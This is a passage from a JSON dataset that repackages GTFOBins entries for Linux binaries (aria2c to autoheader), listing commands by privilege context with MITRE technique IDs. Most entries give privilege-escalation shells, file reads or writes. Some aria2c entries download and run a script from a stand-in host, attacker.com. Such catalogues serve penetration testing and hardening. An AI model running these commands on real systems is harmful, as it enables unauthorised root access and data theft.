multiple times with the same GID.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:1:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:command:1:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:download:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:download:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:download:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:file-read:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:file-read:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aria2c:file-read:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-read:0:sudo","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-read:0:suid","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-read:0:unprivileged","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-write:0:sudo","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-write:0:suid","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arj:file-write:0:unprivileged","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arj/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arp:file-read:0:sudo","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arp:file-read:0:suid","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:arp:file-read:0:unprivileged","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:as:file-read:0:sudo","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/as/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:as:file-read:0:suid","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/as/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:as:file-read:0:unprivileged","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/as/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ascii-xfr:file-read:0:sudo","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ascii-xfr:file-read:0:suid","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ascii-xfr:file-read:0:unprivileged","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ascii85:file-read:0:sudo","toolId":"gtfo:ascii85","toolName":"ascii85","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii85 /path/to/input-file | ascii85 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ascii85/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ascii85:file-read:0:unprivileged","toolId":"gtfo:ascii85","toolName":"ascii85","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ascii85 /path/to/input-file | ascii85 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ascii85/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:file-write:0:sudo","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:file-write:0:suid","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ash -p -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:file-write:0:unprivileged","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:shell:0:sudo","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:shell:0:suid","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ash -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ash:shell:0:unprivileged","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ash/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:0:sudo","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:0:suid","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:0:unprivileged","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:1:sudo","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:1:suid","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:aspell:file-read:1:unprivileged","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aspell/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:asterisk:shell:0:sudo","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/asterisk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:asterisk:shell:0:suid","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/asterisk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:asterisk:shell:0:unprivileged","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/asterisk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:at:command:0:sudo","toolId":"gtfo:at","toolName":"at","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command | at now","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/at/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:at:command:0:unprivileged","toolId":"gtfo:at","toolName":"at","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command | at now","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/at/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:at:shell:0:sudo","toolId":"gtfo:at","toolName":"at","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null","description":"`tail` is used to pause the terminal.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/at/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:at:shell:0:unprivileged","toolId":"gtfo:at","toolName":"at","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null","description":"`tail` is used to pause the terminal.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/at/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:atobm:file-read:0:sudo","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/atobm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:atobm:file-read:0:suid","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/atobm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:atobm:file-read:0:unprivileged","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/atobm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:autoconf:shell:0:sudo","toolId":"gtfo:autoconf","toolName":"autoconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoconf","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoconf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:autoconf:shell:0:unprivileged","toolId":"gtfo:autoconf","toolName":"autoconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoconf","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoconf/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:autoheader:shell:0:sudo","toolId":"gtfo:autoheader","toolName":"autoheader","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoheader","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoheader/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:autoheader:shell:0:unprivileged","toolId":"gtfo:autoheader","toolName":"autoheader","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x 